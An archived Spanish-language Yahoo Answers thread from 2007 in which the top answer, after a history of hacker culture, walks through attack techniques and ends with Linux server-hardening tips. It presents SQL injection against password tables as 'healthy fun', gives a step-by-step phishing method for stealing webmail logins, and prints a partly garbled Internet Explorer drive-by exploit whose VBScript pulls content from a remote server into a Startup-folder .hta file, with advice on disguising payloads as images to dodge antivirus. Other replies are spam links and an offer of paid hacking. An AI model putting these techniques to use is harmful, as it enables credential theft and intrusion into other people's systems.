Pregunta:
como se puede ser un hacker?
2007-07-28 11:03:48 UTC
como se puede ser un hacker?
Seis respuestas:
?
2007-07-28 11:25:54 UTC
1. Cómo ser un hacker:



Seguramente usted habrá visto ese capítulo de la serie CSI donde un juvenil y arrogante "hacker" coloca su laptop sobre el escritorio para mostrar sus habilidades con... ¡Windows XP! Pero más allá de los productores televisivos mal informados, el hecho es que mucha gente sueña con ser un hacker. Es común recibir correos pidiendo ayuda para "tirar" un sitio o robar una contraseña de hotmail.



Pero antes de continuar debemos aclarar lo que es y no es un hacker. Un hacker es un experto en computadoras, pero también es un revolucionario, un inconforme, un pistón de la sociedad. La historia de los hackers se remonta a los 60, cuando John Draper (el famoso Capitán Crunch) se las arregló para construir una caja (la blue box) que simulaba los tonos del conmutador de la central telefónica según la frecuencia al país que se deseará comunicar: 2600 Hz para hacer llamadas de larga distancia dentro de EU, 3825 Hz para Argentina, 2400 Hz para la India, etcétera. Sólo se debía estar atento al leve "clíck" del conmutador para enviar la petición de conexión.



De este modo se podían hacer llamadas de larga distancia gratis desde cualquier teléfono público. La "Blue Box", que se construía con una caja de cereal, se hizo muy popular. En San Franciso se dieron indicaciones a la policía para revisar a los jóvenes con gabardina, pues era necesaria para ocultar la caja de cereal. Los Steves (Jobs y Wozniak), fundadores de Apple, eran grandes admiradores del capitán Crunch, construyeron e incluso hicieron mejoras a la blue box. Un tal Joe Engressia se hizo famoso, pues podía simular los tonos del conmutador ¡con la boca!

John Draper, al igual que kevin Mitnick, el hacker más famoso de todos los tiempos, no estaba motivado por el dinero, sino por la curiosidad, el orgullo y el desafio intelectual que implicaba vencer a un sistema que restringía la libertad. Esto es importante, pues los hackers no están sólo en las computadoras, existen floricultores, mecánicos y chefs que aún cuando no saben usar una computadora pueden ser catalogados como hackers dentro de su actividad. Hacker es una actitud, una forma de acercarse a lo que uno hace de manera juguetona, retadora y curiosa. Mozart fue un excelente hacker de la música.



Sólo se puede ser hacker de las cosas que uno le gustan y entusiasman. No se puede ser hacker por obligación. Existen otro tipo de personas (sobre todo adolescentes) que se autollaman hackers, pero no lo son. Ellos presumen de haber entrado a un sistema, robado una contraseña o borrado una base de datos, se ponen nicknames ridículos como K3rN3li0 o Ciber||fuel. Estos no son hackers, sino crackers, personas con baja autoestima que buscan un poco de admiración y cariño poniendo la seguridad de un sistema en entredicho. El término "cracker" fue creado por los hackers por la concepción errónea que la gente tiene de ellos gracias a los medios de comunicación.



2. Los verdaderos hackers:



Los verdaderos hackers poseen un alto sentido de la ética y son muy responsables de lo que hacen. El código de ética del hacker —que no tiene porque coincidir con el código legal ;-) — puede resumirse en los siguientes puntos:



1. El acceso a los ordenadores, y a cualquier cosa que pudiera enseñarte algo sobre cómo funciona el mundo debería ser ilimitado y total.

2. Básate siempre en el imperativo de la práctica.

3. Toda información debería ser libre.

4. Desconfía de la autoridad y la tradición: piensa por tí mismo.

5. Los hackers deberían ser juzgados únicamente por su habilidad en el hackeo, no por criterios sin sentido como los títulos, edad, raza o posición social.

6. Todo es copiable.

7. Los derechos de propiedad intelectual, son inmorales.

8. Se puede ser artista frente a una computadora.

9. Cracker = perdedor



Hablando especificamente de ser un hacker de computadoras, existen varios pasos que se deben seguir para convertirse en un hacker. Entre ellos están:



* Crea tu página en internet. Dado que la mayoría del hackeo se hace sobre el Web, debes tener claro como se hacen los sitios de Internet.

* Instala Linux en tu computadora. Esto sin duda es lo más importante, Linux te obliga a revisar código y opciones de configuración que te hacen entender cómo funciona una computadora "hacia adentro" y "hacia afuera".

* Regala tanto CDs de software libre como puedas. Hay que hacer algo por la causa.

* Aprende un lenguaje de programación y SQL. Esto es fundamental, te sorprenderás como en unos pocos meses aprendes a dominar Python y comienzas a desarrollar tus propios programas de hackeo.

* Practica, practica, y practica. Todas las horas que puedas.

* Publica las cosas que vas aprendiendo. Mantén tu sitio actualizado de las cosas que vas descubriendo.

* Ayuda a los demás. Sé generoso, cuando ya seas un hacker recuerda que hay otra generación de hackers detrás de ti y hay que pasarles la antorcha.



De esta manera llegarás a ser un hacker respetado dentro de la comunidad.



3. Técnicas de hackeo:



Ahora bien, quizás estas leyendo esto porque quieres hacerte una idea de cómo se hackea un sitio. Existen varios niveles y técnicas de hackeo:



Change Coding Este tipo de hackeo es muy divertido y, la mayoría de las veces, inocuo. Se trata simplemente de modificar el código que despliega una página de Internet agregando órdenes en javascript o VB Script desde la barra URL del navegador. Incluso la elemental página de Google ha sufrido este tipo de hacking.



SQL Injection Como habrás notado, muchos sitios en la red muestran una caja de "Buscar" o "Search". En SQL el punto y coma (;) funcionan como el fin de comando y el doble guión (--) como comentario. Si sabes el nombre de la tabla (o intentas adivinarlo) donde se guardan los passwords de los usuarios puedes jugar un poco enviando cosas como: UPDATE users SET password="hack"; este tipo de hackeo es muy entretenido (horas y horas de sana diversión ;-) ) y te sorprenderás del hecho de que incluso sitios de grandes empresas internacionales no poseen ningún sistema de filtrado. SQL Ruleezzz!!!



Phising "password harvesting fishing" (cosecha y pesca de contraseñas) es una técninca que consiste en duplicar (hasta en el más mínimo detalle) un sitio web verdadero en nuestro propio servidor. Debemos ir a Hotmail, Gmail, Yahoo!, etcétera, ver el código HTML y guardarlo en nuestro propio server. Luego enviamos un email a la persona de la cual deseamos su clave con algo como "Alguien muy especial te ha enviado una Ciber-tarjeta, haz click aquí" y lo enviamos a nuestro propio Webserver en Linux. El usuario cree que está entrando en la página de inicio de Hotmail e introduce su login y password, ¡pero ahora es nuestro!



Dictionary's attack Existen personas (y administradores de sistemas) que piensan que por usar palabras como "fanerogama"o "porfirogeneta" como password, nadie los podrá adivinar. Pero en realidad esas palabras existen en cualquier diccionario, y los diccionarios que sirven para revisar la ortografía en los procesadores de texto como AbiWord, también pueden ser usados para intentar logearse dentro de un sistema ajeno. Existen scripts que usan cada palabra de los diccionarios en español, inglés, francés, finlandés, turco, etc. para hacer un login. Estos scripts pueden tardarse mucho tiempo haste encontrar un password que corresponda a la palabra y cuando lo hacen, envian un email al hacker para avisarle cual palabra es un password. Los hackers que se consideran a sí mismos elegantes y creativos sienten aversión por este tipo de hackeo pues en el simplemente se aplica la fuerza bruta (y la paciencia).



buffer overflow (o simplemente overflow). Los programas se almacenan en buffers (secciones contiguas de memoria), bajo ciertas circunstancias los datos que se envían al buffer sobrepasan su capacidad y la memoria se "desparrama", generalmente esto provoca que el programa colapse pero muchas veces, durante una pequeña fracción de segundo, la información enviada al buffer puede ejecutarse con los permisos del usuario dueño del proceso. El hacker (que debe conocer bien C y ensamblador) aprovecha esto, envía muchos datos al buffer, para desbordarlo y ejecutar código malicioso. Existen pocos hackers con el suficiente talento como para aprovechar un overflow recién descubierto, el problema es que luego de un par de semanas de conocido el exploit, comienzan a aparecer en la red scripts que automatizan el hackeo y todos los script kiddies comienzan a ejecutarlos. Solución: coloque un "apt-get -f -y dist-upgrade" en el cron y manténgase informado.



A los errores en la programación se les conoce como "bugs" o bichos, la mayoría de los bugs sólo hacen que los programas no funcionen como deben pero algunos pueden ser aprovechdos para violar la seguridad, a estos bugs se les conoce como "exploits". Es decir, no todos los bugs son exploits pero todo exploit es un bug.



Denegation of Service o DOS La denegación de un servicio implica que el hacker ha aprovechado un bug en un programa para " tirar" un servicio del servidor. Generalmente se trata del Webserver. El IIS de Microsoft es particularmente vulnerable a este tipo de ataques. Tanto el Change Coding como el DOS son hacks relativamente benévolos pues no implican (necesariamente) a un intruso en el sistema.



Aplication level Esto ya es más serio, alguien se ha apropiado de una aplicacón del sistema. La mayoría de las veces se trata de una aplicación Web como PHP-Nuke o MyAdmin. Sin embargo en ocasiones el dominio de una aplicación conduce a tener más accesos y facilidades en el hackeo.



Root hacking Este es el hack más grave, el hacker ha tomado el control del sistema y puede hacer lo que quiera con él. Generalmente el hacker tratará de pasar desapercibido y creára un usuario con todos los derechos para entrar cuando quiera al sistema y regodearse de lo poco hábil que es el administrador.



Hay que considerar que muchas veces no existe una diferencia clara en estos niveles. Muchos hackeos al root empezaron siendo un simple juego de Cross Scripting con el cual el hacker obtuvo el password de PHPNuke, con lo cual se hizo con el password de Mysql y dado que era una versión no actualizada de Mysql, ejecutó un overflow con el que se hizo root. Si detectamos un root hacking lo primero es desconectar el equipo de la red, hacer un análisis forense de los paso del hacker, respaldar y formatear el disco duro incluyendo el MBR. Muchos administradores se sienten avergonzados y reinstalan el sistema rápidamente y sin decirle a nadie que ha sido hackeado. Esta es una actitud equivocada, sea humilde y reconozca que ha sido vencido en buena lid. Infórmele a sus colegas y hagan juntos el análisis de cómo fue que el intruso entró y como mejorar las políticas para que eso no vuelva a ocurrir. Un hacker puede enseñarle muchísimo sobre seguridad, aún cuando no hubiese tenido ninguna intención de ello.



Cross Scripting, o XSS, es una técnica de hackeo que consiste en enviar información maliciosa a través del browser. En versiones anteriores de Internet Explorer era suficiente con colocar

?op=userinfo&uname=

El objeto id: localpage (que posee un formato de extensión de los archivos de ayuda de Windows) le dice a hhctrl.ocx que abrá una ventana de ayuda para C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm (un archivo normal del sistema que está en todos los Windows XP).



El segundo objecto id: inject llama al script hospedado en www.mononeurona.org/writehta.txt que inyecta el código remoto de este archivo, haciendo un XSS típico. El archivo writehta.txt contiene instrucciones maliciosas para crear un objeto ADODB.Connection:



Dim Conn, rs Set Conn = CreateObject("ADODB.Connection") Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _ "Dbq=http://www.mononeurona.org;∞" & _ "Extensions=asc,csv,tab,txt;" & _ "Persist Security Info=False" Dim sql sql = "SELECT * from foobar.txt" set rs = conn.execute(sql) set rs =CreateObject("ADODB.recordset") rs.Open "SELECT * from foobar.txt", conn rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ Microsoft Office.hta", adPersistXML rs.close conn.close window.close

Este archivo es usado para ejecutar un query SQL: sql = "SELECT * from foobar.txt", donde foobar.txt es hospedado en el servidor FTP del atacante (el cual está configurado para permitir el acceso anónimo). El resultado del query se salva en el archivo C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta.



El objeto ADODB y el archivo foobar.txt también pueden ejecutarse colocándolos escondidos como si fuesen una imagen: todos los antivirus están configurado para no escanear los archivos de imágenes de modo que podemos colarnos con facilidad al sistema.



Practicamente no hay límites en lo que uno puede guardar en este archivo hta y además, como se guarda en el menú "All Users" se ejecuta cada vez que un usuario se logea en Windows XP. Por supuesto lo primero que una persona maliciosa haría sería buscar los números de tarjetas de crédito y los password de todo el sistema ¡Gracias Microsoft!



Y todo esto lo hemos hecho sin que el usuario tuviese que recibir un email o apretar un botón, simplemente entrando a la página sp2rc.html. Miles de páginas en Internet tienen este código y si usted usa Internet Explorer 6 para navegar seguramente ya tiene el archivo hta en su disco pues los antivirus no lo detectan. Como digo, este código está muy de moda, y al parecer no habrá parche hasta finales del 2005. Los que usan Mozilla-Firefox∞ en XP están a salvo, pues este código no les afecta ;-). De cualquier manera si se ve a obligado a usar Windows XP por la necesidad de usar CorelDraw o Autocad no navegue en este sistema operativo. Al terminar de usar ese programa, bootee a Linux (porque tiene Linux ¿verdad?) y desde ahí navegue, consulte su email y use Messenger.



5. Consejos para no ser hackeado:



Si tú, como muchos de nosotros, tienes un servidor Linux en la red, estos son los consejos básicos de seguridad:



1. Instala lo mínimo indispensable Realiza un deborphan cada tanto, no instales samba en un equipo que tiene webserver.

2. Usa password alfanuméricos Mezcla números y letras como caktus90 o 8qwer9. No uses passwords de palabras que están en el diccionario. No uses un password del sistema para suscribirte a una lísta de correo o un foro.

3. No instales Telnet y FTP Prefiere SSH y un servidor FTP sobre SSL como vsFTP. No permitas accessos remotos del root por SSH. Permite un solo usuario en AllowUsers para evitar ataques de diccionario. Trata de encriptar todo lo que entre al sistema, incluyendo el correo.

4. Actualiza cada semana De preferencia realiza las actualizaciones de noche, si apt-get sugiere instalar un nuevo archivo de configuración en lugar del que estás usando prefiere el que trae el paquete, muchas veces el problema no es el programa sino la configuración.

5. No instales las X Un servidor no siquiera debería de tener monitor, todo debe hacerse a través de SSH.

6. Enjaula los demonios Corre apache, OpenSSH y la base datos de datos "enjaulados" en un chroot.

7. Watch Log Instala un reporteador de logs que te envie un reporte general del sistema cada tres días, hay mucha información útil en los logs que se pierde por no saber extraer la información.

8. No instales compiladores Si necesitas compilar un nuevo kernel, desinstala gcc y el paquete libc6-dev luego de bootear con el nuevo kernel.

9. Suscríbete a una lista de anuncios de seguridad Existen muchas, también puedes visitar sitios como La cofradía∞ donde se anuncian bugs de seguridad y cómo corregirlos.

10. Nmap on myself Una forma de descubrir si un troyano ha abierto un backdoor es correr nmap contra nuestro propio servidor. Así te darás una idea de lo que un hacker (o cracker) vería si escanea tu servidor.

11. Apache mod_security No sé porque este magnífico módulo no viene por omisión pero practicamente todos los Cross Scripting quedan anulados con él.

12. MVC El model view controller no sólo sirve para separar el diseño de la programación sino que incrementa la seguridad. Si estas haciendo una aplicación web con python, php o perl crea una clase para la base de datos que guarde los valores, cierra la base de datos y después inserta los valores en el código XHTML.



No hackeamos cuentas de hotmail.com, no preguntes como ser un hacker: instala Linux en tu equipo con el Webserver, programa en Perl y serás un hacker.





...



Espero haberte ayudado...



Bye ! =D=D
meni
2015-05-10 12:04:53 UTC
http://es.fbwand.com/?ref=198589
Fernanda
2014-11-25 04:57:44 UTC
Muchas Personas tratan de hacer dinero con el trading online, pero sólo unos pocos tienen éxito ... ¿por qué?

Porque saben cómo hacer y seguir una estrategia precisa. Si usted desea aprender cómo realmente hacer dinero con el trading online a verlo http://trading-on.info
hiram b
2007-07-28 11:13:27 UTC
pues estudia para eso hay una carrera k se llama ingieneria en sistemas computacionales o licenciatura en informatica
Malopa
2007-07-28 11:12:28 UTC
Primero que eso no lo tendrias que preguntar. Pero tendrias que saber mucho de computacion y tener una gran capacidad y rapidez en tu cerebro.
2007-07-28 11:08:49 UTC
hacker o craker men mira pasa ser un hacker o craker necesita ser aifcionado de la informatica y pasa horas en el internet y vestigar sobre todo lo que sale lo nuevo de las pc saber muchas cosas men ya que la inter... de ahora ya es un poko mas segura u.U YA NO ES COMO ANTES QUE ERA MAS FACIL DE HACKEAR O CRAKEAR Y UNA SI ERES UNA HACKER O QUIER SER NUCA DES TU INDETIDA PONTE UN SOBRE NOMBRE Y CUANDO TE DIGA COMO SE HACE TAL COSA DILES QUE NO SABE JOJOJO ALMENOS QUE TE OFRESCA UN BUEN DE DINERO...

SI GUSTAS TE PUEDE COMONICAR CONMIGO MI MSN ESTA EN MI PERFIL OKIS CUIDATE Y BIENVENIDO ALA INFORMATICA


Este contenido se publicó originalmente en Y! Answers, un sitio web de preguntas y respuestas que se cerró en 2021.
Loading...